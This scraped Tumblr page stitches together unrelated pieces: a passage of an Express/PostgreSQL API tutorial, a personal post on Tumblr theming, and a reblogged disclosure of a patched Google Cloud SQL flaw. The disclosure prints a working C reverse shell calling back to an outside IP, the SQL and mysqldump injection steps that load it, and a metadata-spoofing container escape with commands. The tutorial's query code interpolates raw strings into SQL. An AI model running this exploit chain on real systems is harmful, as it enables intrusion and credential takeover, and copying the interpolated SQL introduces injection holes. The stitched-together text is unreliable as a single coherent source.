and use is as the return message for a request from the / route. Visit http://localhost:3000/v1 and you should see the message, as shown below. { "message": "Environment variable is coming across." } And that’s it. From now on we can add as many environment variables as we want and we can export them from our settings.js file. This is a good point to commit your code. Remember to prettify and lint your code. The corresponding branch on my repo is 03-env-variables. Writing Our First Test It’s time to incorporate testing into our app. One of the things that give the developer confidence in their code is tests. I’m sure you’ve seen countless articles on the web preaching Test-Driven Development (TDD). It cannot be emphasized enough that your code needs some measure of testing. TDD is very easy to follow when you’re working with Express.js. In our tests, we will make calls to our API endpoints and check to see if what is returned is what we expect. Install the required dependencies: # install dependencies yarn add mocha chai nyc sinon-chai supertest coveralls --dev Each of these libraries has its own role to play in our tests. mocha test runner chai used to make assertions nyc collect test coverage report sinon-chai extends chai’s assertions supertest used to make HTTP calls to our API endpoints coveralls for uploading test coverage to coveralls.io Create a new test/ folder at the root of your project. Create two files inside this folder: test/setup.js test/index.test.js Mocha will find the test/ folder automatically. Open up test/setup.js and paste the below code. This is just a helper file that helps us organize all the imports we need in our test files. import supertest from 'supertest'; import chai from 'chai'; import sinonChai from 'sinon-chai'; import app from '../src/app'; chai.use(sinonChai); export const { expect } = chai; export const server = supertest.agent(app); export const BASE_URL = '/v1'; This is like a settings file, but for our tests. This way we don’t have to initialize everything inside each of our test files. So we import the necessary packages and export what we initialized — which we can then import in the files that need them. Open up index.test.js and paste the following test code. import { expect, server, BASE_URL } from './setup'; describe('Index page test', () => { it('gets base url', done => { server .get(`${BASE_URL}/`) .expect(200) .end((err, res) => { expect(res.status).to.equal(200); expect(res.body.message).to.equal( 'Environment variable is coming across.' ); done(); }); }); }); Here we make a request to get the base endpoint, which is / and assert that the res.body object has a message key with a value of Environment variable is coming across. If you’re not familiar with the describe, it pattern, I encourage you to take a quick look at Mocha’s “Getting Started” doc. Add the test command to the scripts section of package.json. "test": "nyc --reporter=html --reporter=text --reporter=lcov mocha -r @babel/register" This script executes our test with nyc and generates three kinds of coverage report: an HTML report, outputted to the coverage/ folder; a text report outputted to the terminal and an lcov report outputted to the .nyc_output/ folder. Now run yarn test. You should see a text report in your terminal just like the one in the below photo. Test coverage report (Large preview) Notice that two additional folders are generated: .nyc_output/ coverage/ Look inside .gitignore and you’ll see that we’re already ignoring both. I encourage you to open up coverage/index.html in a browser and view the test report for each file. This is a good point to commit your changes. The corresponding branch in my repo is 04-first-test. Continuous Integration(CD) And Badges: Travis, Coveralls, Code Climate, AppVeyor It’s now time to configure continuous integration and deployment (CI/CD) tools. We will configure common services such as travis-ci, coveralls, AppVeyor, and codeclimate and add badges to our README file. Let’s get started. Travis CI Travis CI is a tool that runs our tests automatically each time we push a commit to GitHub (and recently, Bitbucket) and each time we create a pull request. This is mostly useful when making pull requests by showing us if the our new code has broken any of our tests. Visit travis-ci.com or travis-ci.org and create an account if you don’t have one. You have to sign up with your GitHub account. Hover over the dropdown arrow next to your profile picture and click on settings. Under Repositories tab click Manage repositories on Github to be redirected to Github. On the GitHub page, scroll down to Repository access and click the checkbox next to Only select repositories. Click the Select repositories dropdown and find the express-api-template repo. Click it to add it to the list of repositories you want to add to travis-ci. Click Approve and install and wait to be redirected back to travis-ci. At the top of the repo page, close to the repo name, click on the build unknown icon. From the Status Image modal, select markdown from the format dropdown. Copy the resulting code and paste it in your README.md file. On the project page, click on More options > Settings. Under Environment Variables section, add the TEST_ENV_VARIABLE env variable. When entering its value, be sure to have it within double quotes like this "Environment variable is coming across." Create .travis.yml file at the root of your project and paste in the below code (We’ll set the value of CC_TEST_REPORTER_ID in the Code Climate section). language: node_js env: global: - CC_TEST_REPORTER_ID=get-this-from-code-climate-repo-page matrix: include: - node_js: '12' cache: directories: [node_modules] install: yarn after_success: yarn coverage before_script: - curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter - chmod +x ./cc-test-reporter - ./cc-test-reporter before-build script: - yarn test after_script: - ./cc-test-reporter after-build --exit-code $TRAVIS_TEST_RESUL First, we tell Travis to run our test with Node.js, then set the CC_TEST_REPORTER_ID global environment variable (we’ll get to this in the Code Climate section). In the matrix section, we tell Travis to run our tests with Node.js v12. We also want to cache the node_modules/ directory so it doesn’t have to be regenerated every time. We install our dependencies using the yarn command which is a shorthand for yarn install. The before_script and after_script commands are used to upload coverage results to codeclimate. We’ll configure codeclimate shortly. After yarn test runs successfully, we want to also run yarn coverage which will upload our coverage report to coveralls.io. Coveralls Coveralls uploads test coverage data for easy visualization. We can view the test coverage on our local machine from the coverage folder, but Coveralls makes it available outside our local machine. Visit coveralls.io and either sign in or sign up with your Github account. Hover over the left-hand side of the screen to reveal the navigation menu. Click on ADD REPOS. Search for the express-api-template repo and turn on coverage using the toggle button on the left-hand side. If you can’t find it, click on SYNC REPOS on the upper right-hand corner and try again. Note that your repo has to be public, unless you have a PRO account. Click details to go to the repo details page. Create the .coveralls.yml file at the root of your project and enter the below code. To get the repo_token, click on the repo details. You will find it easily on that page. You could just do a browser search for repo_token. repo_token: get-this-from-repo-settings-on-coveralls.io This token maps your coverage data to a repo on Coveralls. Now, add the coverage command to the scripts section of your package.json file: "coverage": "nyc report --reporter=text-lcov | coveralls" This command uploads the coverage report in the .nyc_output folder to coveralls.io. Turn on your Internet connection and run: yarn coverage This should upload the existing coverage report to coveralls. Refresh the repo page on coveralls to see the full report. On the details page, scroll down to find the BADGE YOUR REPO section. Click on the EMBED dropdown and copy the markdown code and paste it into your README file. Code Climate Code Climate is a tool that helps us measure code quality. It shows us maintenance metrics by checking our code against some defined patterns. It detects things such as unnecessary repetition and deeply nested for loops. It also collects test coverage data just like coveralls.io. Visit codeclimate.com and click on ‘Sign up with GitHub’. Log in if you already have an account. Once in your dashboard, click on Add a repository. Find the express-api-template repo from the list and click on Add Repo. Wait for the build to complete and redirect to the repo dashboard. Under Codebase Summary, click on Test Coverage. Under the Test coverage menu, copy the TEST REPORTER ID and paste it in your .travis.yml as the value of CC_TEST_REPORTER_ID. Still on the same page, on the left-hand navigation, under EXTRAS, click on Badges. Copy the maintainability and test coverage badges in markdown format and paste them into your README.md file. It’s important to note that there are two ways of configuring maintainability checks. There are the default settings that are applied to every repo, but if you like, you could provide a .codeclimate.yml file at the root of your project. I’ll be using the default settings, which you can find under the Maintainability tab of the repo settings page. I encourage you to take a look at least. If you still want to configure your own settings, this guide will give you all the information you need. AppVeyor AppVeyor and Travis CI are both automated test runners. The main difference is that travis-ci runs tests in a Linux environment while AppVeyor runs tests in a Windows environment. This section is included to show how to get started with AppVeyor. Visit AppVeyor and log in or sign up. On the next page, click on NEW PROJECT. From the repo list, find the express-api-template repo. Hover over it and click ADD. Click on the Settings tab. Click on Environment on the left navigation. Add TEST_ENV_VARIABLE and its value. Click ‘Save’ at the bottom of the page. Create the appveyor.yml file at the root of your project and paste in the below code. environment: matrix: - nodejs_version: "12" install: - yarn test_script: - yarn test build: off This code instructs AppVeyor to run our tests using Node.js v12. We then install our project dependencies with the yarn command. test_script specifies the command to run our test. The last line tells AppVeyor not to create a build folder. Click on the Settings tab. On the left-hand navigation, click on badges. Copy the markdown code and paste it in your README.md file. Commit your code and push to GitHub. If you have done everything as instructed all tests should pass and you should see your shiny new badges as shown below. Check again that you have set the environment variables on Travis and AppVeyor. Repo CI/CD badges. (Large preview) Now is a good time to commit our changes. The corresponding branch in my repo is 05-ci. Adding A Controller Currently, we’re handling the GET request to the root URL, /v1, inside the src/routes/index.js. This works as expected and there is nothing wrong with it. However, as your application grows, you want to keep things tidy. You want concerns to be separated — you want a clear separation between the code that handles the request and the code that generates the response that will be sent back to the client. To achieve this, we write controllers. Controllers are simply functions that handle requests coming through a particular URL. To get started, create a controllers/ folder inside the src/ folder. Inside controllers create two files: index.js and home.js. We would export our functions from within index.js. You could name home.js anything you want, but typically you want to name controllers after what they control. For example, you might have a file usersController.js to hold every function related to users in your app. Open src/controllers/home.js and enter the code below: import { testEnvironmentVariable } from '../settings'; export const indexPage = (req, res) => res.status(200).json({ message: testEnvironmentVariable }); You will notice that we only moved the function that handles the request for the / route. Open src/controllers/index.js and enter the below code. // export everything from home.js export * from './home'; We export everything from the home.js file. This allows us shorten our import statements to import { indexPage } from '../controllers'; Open src/routes/index.js and replace the code there with the one below: import express from 'express'; import { indexPage } from '../controllers'; const indexRouter = express.Router(); indexRouter.get('/', indexPage); export default indexRouter; The only change here is that we’ve provided a function to handle the request to the / route. You just successfully wrote your first controller. From here it’s a matter of adding more files and functions as needed. Go ahead and play with the app by adding a few more routes and controllers. You could add a route and a controller for the about page. Remember to update your test, though. Run yarn test to confirm that we’ve not broken anything. Does your test pass? That’s cool. This is a good point to commit our changes. The corresponding branch in my repo is 06-controllers. Connecting The PostgreSQL Database And Writing A Model Our controller currently returns hard-coded text messages. In a real-world app, we often need to store and retrieve information from a database. In this section, we will connect our app to a PostgreSQL database. We’re going to implement the storage and retrieval of simple text messages using a database. We have two options for setting a database: we could provision one from a cloud server, or we could set up our own locally. I would recommend you provision a database from a cloud server. ElephantSQL has a free plan that gives 20MB of free storage which is sufficient for this tutorial. Visit the site and click on Get a managed database today. Create an account (if you don’t have one) and follow the instructions to create a free plan. Take note of the URL on the database details page. We’ll be needing it soon. ElephantSQL turtle plan details page (Large preview) If you would rather set up a database locally, you should visit the PostgreSQL and PgAdmin sites for further instructions. Once we have a database set up, we need to find a way to allow our Express app to communicate with our database. Node.js by default doesn’t support reading and writing to PostgreSQL database, so we’ll be using an excellent library, appropriately named, node-postgres. node-postgres executes SQL queries in node and returns the result as an object, from which we can grab items from the rows key. Let’s connect node-postgres to our application. # install node-postgres yarn add pg Open settings.js and add the line below: export const connectionString = process.env.CONNECTION_STRING; Open your .env file and add the CONNECTION_STRING variable. This is the connection string we’ll be using to establish a connection to our database. The general form of the connection string is shown below. CONNECTION_STRING="postgresql://dbuser:dbpassword@localhost:5432/dbname" If you’re using elephantSQL you should copy the URL from the database details page. Inside your /src folder, create a new folder called models/. Inside this folder, create two files: pool.js model.js Open pools.js and paste the following code: import { Pool } from 'pg'; import dotenv from 'dotenv'; import { connectionString } from '../settings'; dotenv.config(); export const pool = new Pool({ connectionString }); First, we import the Pool and dotenv from the pg and dotenv packages, and then import the settings we created for our postgres database before initializing dotenv. We establish a connection to our database with the Pool object. In node-postgres, every query is executed by a client. A Pool is a collection of clients for communicating with the database. To create the connection, the pool constructor takes a config object. You can read more about all the possible configurations here. It also accepts a single connection string, which I will use here. Open model.js and paste the following code: import { pool } from './pool'; class Model { constructor(table) { this.pool = pool; this.table = table; this.pool.on('error', (err, client) => `Error, ${err}, on idle client${client}`); } async select(columns, clause) { let query = `SELECT ${columns} FROM ${this.table}`; if (clause) query += clause; return this.pool.query(query); } } export default Model; We create a model class whose constructor accepts the database table we wish to operate on. We’ll be using a single pool for all our models. We then create a select method which we will use to retrieve items from our database. This method accepts the columns we want to retrieve and a clause, such as a WHERE clause. It returns the result of the query, which is a Promise. Remember we said earlier that every query is executed by a client, but here we execute the query with pool. This is because, when we use pool.query, node-postgres executes the query using the first available idle client. The query you write is entirely up to you, provided it is a valid SQL statement that can be executed by a Postgres engine. The next step is to actually create an API endpoint to utilize our newly connected database. Before we do that, I’d like us to create some utility functions. The goal is for us to have a way to perform common database operations from the command line. Create a folder, utils/ inside the src/ folder. Create three files inside this folder: queries.js queryFunctions.js runQuery.js We’re going to create functions to create a table in our database, insert seed data in the table, and to delete the table. Open up queries.js and paste the following code: export const createMessageTable = ` DROP TABLE IF EXISTS messages; CREATE TABLE IF NOT EXISTS messages ( id SERIAL PRIMARY KEY, name VARCHAR DEFAULT '', message VARCHAR NOT NULL ) `; export const insertMessages = ` INSERT INTO messages(name, message) VALUES ('chidimo', 'first message'), ('orji', 'second message') `; export const dropMessagesTable = 'DROP TABLE messages'; In this file, we define three SQL query strings. The first query deletes and recreates the messages table. The second query inserts two rows into the messages table. Feel free to add more items here. The last query drops/deletes the messages table. Open queryFunctions.js and paste the following code: import { pool } from '../models/pool'; import { insertMessages, dropMessagesTable, createMessageTable, } from './queries'; export const executeQueryArray = async arr => new Promise(resolve => { const stop = arr.length; arr.forEach(async (q, index) => { await pool.query(q); if (index + 1 === stop) resolve(); }); }); export const dropTables = () => executeQueryArray([ dropMessagesTable ]); export const createTables = () => executeQueryArray([ createMessageTable ]); export const insertIntoTables = () => executeQueryArray([ insertMessages ]); Here, we create functions to execute the queries we defined earlier. Note that the executeQueryArray function executes an array of queries and waits for each one to complete inside the loop. (Don’t do such a thing in production code though). Then, we only resolve the promise once we have executed the last query in the list. The reason for using an array is that the number of such queries will grow as the number of tables in our database grows. Open runQuery.js and paste the following code: import { createTables, insertIntoTables } from './queryFunctions'; (async () => { await createTables(); await insertIntoTables(); })(); This is where we execute the functions to create the table and insert the messages in the table. Let’s add a command in the scripts section of our package.json to execute this file. "runQuery": "babel-node ./src/utils/runQuery" Now run: yarn runQuery If you inspect your database, you will see that the messages table has been created and that the messages were inserted into the table. If you’re using ElephantSQL, on the database details page, click on BROWSER from the left navigation menu. Select the messages table and click Execute. You should see the messages from the queries.js file. Let’s create a controller and route to display the messages from our database. Create a new controller file src/controllers/messages.js and paste the following code: import Model from '../models/model'; const messagesModel = new Model('messages'); export const messagesPage = async (req, res) => { try { const data = await messagesModel.select('name, message'); res.status(200).json({ messages: data.rows }); } catch (err) { res.status(200).json({ messages: err.stack }); } }; We import our Model class and create a new instance of that model. This represents the messages table in our database. We then use the select method of the model to query our database. The data (name and message) we get is sent as JSON in the response. We define the messagesPage controller as an async function. Since node-postgres queries return a promise, we await the result of that query. If we encounter an error during the query we catch it and display the stack to the user. You should decide how choose to handle the error. Add the get messages endpoint to src/routes/index.js and update the import line. # update the import line import { indexPage, messagesPage } from '../controllers'; # add the get messages endpoint indexRouter.get('/messages', messagesPage) Visit http://localhost:3000/v1/messages and you should see the messages displayed as shown below. Messages from database. (Large preview) Now, let’s update our test file. When doing TDD, you usually write your tests before implementing the code that makes the test pass. I’m taking the opposite approach here because we’re still working on setting up the database. Create a new file, hooks.js in the test/ folder and enter the below code: import { dropTables, createTables, insertIntoTables, } from '../src/utils/queryFunctions'; before(async () => { await createTables(); await insertIntoTables(); }); after(async () => { await dropTables(); }); When our test starts, Mocha finds this file and executes it before running any test file. It executes the before hook to create the database and insert some items into it. The test files then run after that. Once the test is finished, Mocha runs the after hook in which we drop the database. This ensures that each time we run our tests, we do so with clean and new records in our database. Create a new test file test/messages.test.js and add the below code: import { expect, server, BASE_URL } from './setup'; describe('Messages', () => { it('get messages page', done => { server .get(`${BASE_URL}/messages`) .expect(200) .end((err, res) => { expect(res.status).to.equal(200); expect(res.body.messages).to.be.instanceOf(Array); res.body.messages.forEach(m => { expect(m).to.have.property('name'); expect(m).to.have.property('message'); }); done(); }); }); }); We assert that the result of the
Tumblr media
Agilenano - News from Agilenano from shopsnetwork (4 sites) https://agilenano.com/blogs/news/how-to-set-up-an-express-api-backend-project-with-postgresql-chidi-orji-2020-04-08t11-00-00-00-002020-04-08t13-35-17-00-00
0 notes
logothanatos · 8 years ago
Text
Update on Blogging Plans
Uncertainty regarding servers
Due to the amount of time it would take to make a blog from scratch on my own, I have decided to use Tumblr as a temporary holding place for my posts. Sure, it doesn’t have export features like Wordpress does, but it seems to be the most convenient for both customization and de-cluttering. Wordpress was also having an issue for me where it had the user interface in two completely different designs, and links to the Wordpress dashboard would seem to link to either of the design versions. This lead to a jarring user experience and it was a distraction from publishing posts. I think the original plan of building a web blog from scratch will have to be postponed indefinitely since I need to plan dedicated hardware beyond a mere Raspberry Pi, or at least would have to plan for contingencies if I’m to self-host. Alternatively I could do the standard of paying for server space, though I’m not a huge fan of that. I want my data at home as much as possible while still sharing with or web-“serving” others. It seems to me this decision goes hand in hand with software decisions, in terms of what database server software or web server software I’d want to use. In fact, with the nascent development of decentralized blockchain projects this decision is bound to compel hesitation on my part. For example, I could use the IPFS network as a CDN for my website or host my website on IPFS using something like Hugo/Pelican, which can give me some of the perks of a dynamic website without legitimately having to be one (so to speak). On the other hand I could wait for these to mature. In that case, if I self-host nonetheless, I believe I’m stuck with the following: PostgreSQL v. RethinkDB/BigchainDB with Nginx/Nodejs.
That would mean, though, expected flexibility in the capacity to purchase new hardware. I do desire something more powerful than merely a Raspberry Pi. Something else I’ve considered is enabling that my computer run on a terminal server session as opposed to a desktop session, never turning it off. The problem is probably that I have no stable source of income and so no baseline for the monetary aspect of cost-benefit assessment.  This is especially the case when considering data redundancy and long-term server load handling.
Regarding idleness on current Tumblr blog
I may in fact be idle on this blog for a certain amount of time, or the blog CSS styling and HTML structure may lack a sufficient degree of integrity as I use the blog supposing I cease idleness. So far I’ve been spending a good amount of time on creating a custom HTML/CSS theme since I wasn’t satisfied with the free themes (and apparently there are less free Tumblr themes than there used to be--quite the travesty). I was also going to incorporate some Javascript, but to save time from trying to figure out why otherwise perfectly valid JS doesn’t seem to work I’ve decided to jettison use of JS (for now)  for standard hard-coding of HTML. That’s not to say I don’t plan to replace this with JS over time in a piecemeal fashion.
Notes on Custom Tumblr Theme
So far, I’ll make a note here of the next few tasks I still have forthcoming for the Tumblr theme.
Tumblr media
So far I’ve only defined properties for the textid class (which is to say, only added the identifier color of the little top-right box of a given post to the text post-type). I will need to define such properties for other [post-type]id classes (which is to say, will have to add the identifier color box to other post-types).
Tumblr media
Here, on the other hand, I will need to further define li classes under the ol postlist class tag by inserting “{TagsasClasses}.” For “{block:[post-type]} sections under the “{block:Posts}” section it may also be useful to specify share buttons for external services (e.g., Facebook, Kitsu) in the postop class p tag, though this task may be focused on later. Before moving to such a task it is best to at least figure out the issue of the Like and Reblog buttons floating to the left as opposed to floating to the right as the postop class p tag was styled to do; to figure out why the portrait/avatar image in the postbottom class p tag is not near the right edge of the postitem class li tag despite postitem being styled to float right; and finally, to specify background images via CSS for certain tags potentially defining one of the id attributes in the “{block:TagPage}” section of the markup code.
1 note · View note
itbeatsbookmarks · 5 years ago
Link
(Via: Hacker News)
Note: The vulnerabilities that are discussed in this post were patched quickly and properly by Google. We support responsible disclosure. The research that resulted in this post was done by me and my bughunting friend Ezequiel Pereira. You can read this same post on his website
About Cloud SQL
Google Cloud SQL is a fully managed relational database service. Customers can deploy a SQL, PostgreSQL or MySQL server which is secured, monitored and updated by Google. More demanding users can easily scale, replicate or configure high-availability. By doing so users can focus on working with the database, instead of dealing with all the previously mentioned complex tasks. Cloud SQL databases are accessible by using the applicable command line utilities or from any application hosted around the world. This write-up covers vulnerabilities that we have discovered in the MySQL versions 5.6 and 5.7 of Cloud SQL.
Limitations of a managed MySQL instance
Because Cloud SQL is a fully managed service, users don’t have access to certain features. In particular, the SUPER and FILE privilege. In MySQL, the SUPER privilege is reserved for system administration related tasks and the FILE privilege for reading/writing to and from files on the server running the MySQL daemon. Any attacker who can get a hold of these privileges can easily compromise the server. 
Furthermore, mysqld port 3306 is not reachable from the public internet by default due to firewalling. When a user connects to MySQL using the gcloud client (‘gcloud sql connect <instance>’), the user’s ip address is temporarily added to the whitelist of hosts that are allowed to connect. 
Users do get access to the ‘root’@’%’ account. In MySQL users are defined by a username AND hostname. In this case the user ‘root’ can connect from any host (‘%’). 
Elevating privileges
Bug 1. Obtaining FILE privileges through SQL injection
When looking at the web-interface of the MySQL instance in the Google Cloud console, we notice several features are presented to us. We can create a new database, new users and we can import and export databases from and to storage buckets. While looking at the export feature, we noticed we can enter a custom query when doing an export to a CSV file. 
Because we want to know how Cloud SQL is doing the CSV export, we intentionally enter the incorrect query “SELECT * FROM evil AND A TYPO HERE”. This query results in the following error: 
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND A TYPO HERE INTO OUTFILE '/mysql/tmp/savedata-1589274544663130747.csv' CHARA' at line 1
The error clearly shows that the user that is connecting to mysql to do the export has FILE privileges. It attempts to select data to temporarily store it into the ‘/mysql/tmp’ directory before exporting it to a storage bucket. When we run ‘SHOW VARIABLES’ from our mysql client we notice that ‘/mysql/tmp’ is the secure_file_priv directory, meaning that ‘/mysql/tmp’ is the only path where a user with FILE privileges is allowed to store files. 
By adding the MySQL comment character (#) to the query we can perform SQL injection with FILE privileges: 
SELECT * FROM ourdatabase INTO ‘/mysql/tmp/evilfile’ #
An attacker could now craft a malicious database and select the contents of a table but can only write the output to a file under ‘/mysql/tmp’. This does not sound very promising so far. 
Bug 2. Parameter injection in mysqldump
When doing a regular export of a database we notice that the end result is a .sql file which is dumped by the ‘mysqldump’ tool. This can easily be confirmed when you open an exported database from a storage bucket, the first lines of the dump reveal the command and version: 
-- MySQL dump 10.13 Distrib 5.7.25, for Linux (x86_64) -- -- Host: localhost Database: mysql -- ------------------------------------------------------ -- Server version 5.7.25-google-log<!-- wp:html --> -- MySQL dump 10.13  Distrib 5.7.25, for Linux (x86_64) 5.7.25-google-log</em></p>
Now we know that when we run the export tool, the Cloud SQL API somehow invokes mysqldump and stores the database before moving it to a storage bucket. 
When we intercept the API call that is responsible for the export with Burp we see that the database (‘mysql’ in this case) is passed as a parameter: 
An attempt to modify the database name in the api call from ‘mysql’ into ‘–help’ results into something that surprised us. The mysqldump help is dumped into a .sql file in a storage bucket. 
mysqldump Ver 10.13 Distrib 5.7.25, for Linux (x86_64) Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved. … Dumping structure and contents of MySQL databases and tables. Usage: mysqldump [OPTIONS] database [tables] OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...] OR mysqldump [OPTIONS] --all-databases [OPTIONS] ... --print-defaults Print the program argument list and exit. --no-defaults Don't read default options from any option file, except for login file. --defaults-file=# Only read default options from the given file #.
Testing for command injection resulted into failure however. It seems like mysqldump is passed as the first argument to execve(), rendering a command injection attack impossible. 
We now can however pass arbitrary parameters to mysqldump as the ‘–help’ command illustrates. 
Crafting a malicious database
Among a lot of, in this case, useless parameters mysqldump has to offer, two of them appear to be standing out from the rest, namely the ‘–plugin-dir’ and the ‘–default-auth’ parameter. 
The –plugin-dir parameter allows us to pass the directory where client side plugins are stored. The –default-auth parameter specifies which authentication plugin we want to use. Remember that we could write to ‘/mysql/tmp’? What if we write a malicious plugin to ‘/mysql/tmp’ and load it with the aforementioned mysqldump parameters? We must however prepare the attack locally. We need a malicious database that we can import into Cloud SQL, before we can export any useful content into ‘/mysql/tmp’. We prepare this locally on a mysql server running on our desktop computers. 
First we write a malicious shared object which spawns a reverse shell to a specified IP address. We overwrite the _init function:
#include <sys/types.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <unistd.h> #include <fcntl.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/ip.h> void _init() { FILE * fp; int fd; int sock; int port = 1234; struct sockaddr_in addr; char * callback = "123.123.123.123"; char mesg[]= "Shell on speckles>\n"; char shell[] = "/bin/sh"; addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = inet_addr(callback); fd = socket(AF_INET, SOCK_STREAM, 0); connect(fd, (struct sockaddr*)&addr, sizeof(addr)); send(fd, mesg, sizeof(mesg), 0); dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); execl(shell, "sshd", 0, NULL); close(fd); }
We compile it into a shared object with the following command: 
gcc -fPIC -shared -o evil_plugin.so evil_plugin.c -nostartfiles
On our locally running database server, we now insert the evil_plugin.so file into a longblob table: 
mysql -h localhost -u root >CREATE DATABASE files >USE files > CREATE TABLE `data` ( `exe` longblob ) ENGINE=MyISAM DEFAULT CHARSET=binary; > insert into data VALUES(LOAD_FILE('evil_plugin.so'));
Our malicious database is now done! We export it to a .sql file with mysqldump: 
Mysqldump -h localhost -u root files > files.sql
Next we store files.sql in a storage bucket. After that, we create a database called ‘files’ in Cloud SQL and import the malicious database dump into it. 
Dropping a Shell
With everything prepared, all that’s left now is writing the evil_plugin.so to /mysql/tmp before triggering the reverse shell by injecting ’–plugin-dir=/mysql/tmp/ –default-auth=evil_plugin’ as parameters to mysqldump that runs server-side. 
To accomplish this we once again run the CSV export feature, this time against the ‘files’ database while passing the following data as it’s query argument: 
SELECT * FROM data INTO DUMPFILE '/mysql/tmp/evil_plugin.so' #
Now we run a regular export against the mysql database again, and modify the request to the API with Burp to pass the correct parameters to mysqldump: 
Success! On our listening netcat we are now dropped into a reverse shell.
Fun fact
Not long after we started exploring the environment we landed our shell in we noticed a new file in the /mysql/tmp directory named ‘greetings.txt’: 
Google SRE (Site Reliability Engineering) appeared to be on to us 🙂 It appeared that during our attempts we crashed a few of our own instances which alarmed them. We got into touch with SRE via e-mail and informed them about our little adventure and they kindly replied back.
However our journey did not end here, since it appeared that we are trapped inside a Docker container, running nothing more than the bare minimum that’s needed to export our database. We needed to find a way to escape and we needed it quickly, SRE knows what we are doing and now Google might be working on a patch. 
Escaping to the host
The container that we had access to was running unprivileged, meaning that no easy escape was available. Upon inspecting the network configuration we noticed that we had access to eth0, which in this case had the internal IP address of the container attached to it. 
This was due to the fact that the container was configured with the Docker host networking driver (–network=host). When running a docker container without any special privileges it’s network stack is isolated from the host. When you run a container in host network mode that’s no longer the case. The container does no longer get its own IP address, but instead binds all services directly to the hosts IP. Furthermore we can intercept ALL network traffic that the host is sending and receiving on eth0  (tcpdump -i eth0). 
The Google Guest Agent (/usr/bin/google_guest_agent)
When you inspect network traffic on a regular Google Compute Engine instance you will see a lot of plain HTTP requests being directed to the metadata instance on 169.254.169.254. One service that makes such requests is the Google Guest Agent. It runs by default on any GCE instance that you configure. An example of the requests it makes can be found below.
The Google Guest Agent monitors the metadata for changes. One of the properties it looks for is the SSH public keys. When a new public SSH key is found in the metadata, the guest agent will write this public key to the user’s .authorized_key file, creating a new user if necessary and adding it to sudoers.
The way the Google Guest Agent monitors for changes is through a call to retrieve all metadata values recursively (GET /computeMetadata/v1/?recursive=true), indicating to the metadata server to only send a response when there is any change with respect to the last retrieved metadata values, identified by its Etag (wait_for_change=true&last_etag=<ETAG>).
This request also includes a timeout (timeout_sec=<TIME>), so if a change does not occur within the specified amount of time, the metadata server responds with the unchanged values.
Executing the attack
Taking into consideration the access to the host network, and the behavior of the Google Guest Agent, we decided that spoofing the Metadata server SSH keys response would be the easiest way to escape our container.
Since ARP spoofing does not work on Google Compute Engine networks, we used our own modified version of rshijack (diff) to send our spoofed response.
This modified version of rshijack allowed us to pass the ACK and SEQ numbers as command-line arguments, saving time and allowing us to spoof a response before the real Metadata response came.
We also wrote a small Shell script that would return a specially crafted payload that would trigger the Google Guest Agent to create the user “wouter”, with our own public key in its authorized_keys file.
This script receives the ETag as a parameter, since by keeping the same ETag, the Metadata server wouldn’t immediately tell the Google Guest Agent that the metadata values were different on the next response, instead waiting the specified amount of seconds in timeout_sec.
To achieve the spoofing, we watched requests to the Metadata server with tcpdump (tcpdump -S -i eth0 ‘host 169.254.169.254 and port 80’ &), waiting for a line that looked like this:
<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1
As soon as we saw that value, we quickly ran rshijack, with our fake Metadata response payload, and ssh’ing into the host:
fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost
Most of the time, we were able to type fast enough to get a successful SSH login :).
Once we accomplished that, we had full access to the host VM (Being able to execute commands as root through sudo).
Impact & Conclusions
Once we escaped to the host VM, we were able to fully research the Cloud SQL instance.
It wasn’t as exciting as we expected, since the host did not have much beyond the absolutely necessary stuff to properly execute MySQL and communicate with the Cloud SQL API.
One of our interesting findings was the iptables rules, since when you enable Private IP access (Which cannot be disabled afterwards), access to the MySQL port is not only added for the IP addresses of the specified VPC network, but instead added for the full 10.0.0.0/8 IP range, which includes other Cloud SQL instances.
Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.
Furthermore,the Google VRP team expressed concern since it might be possible to escalate IAM privileges using the Cloud SQL service account attached to the underlying Compute Engine instance
0 notes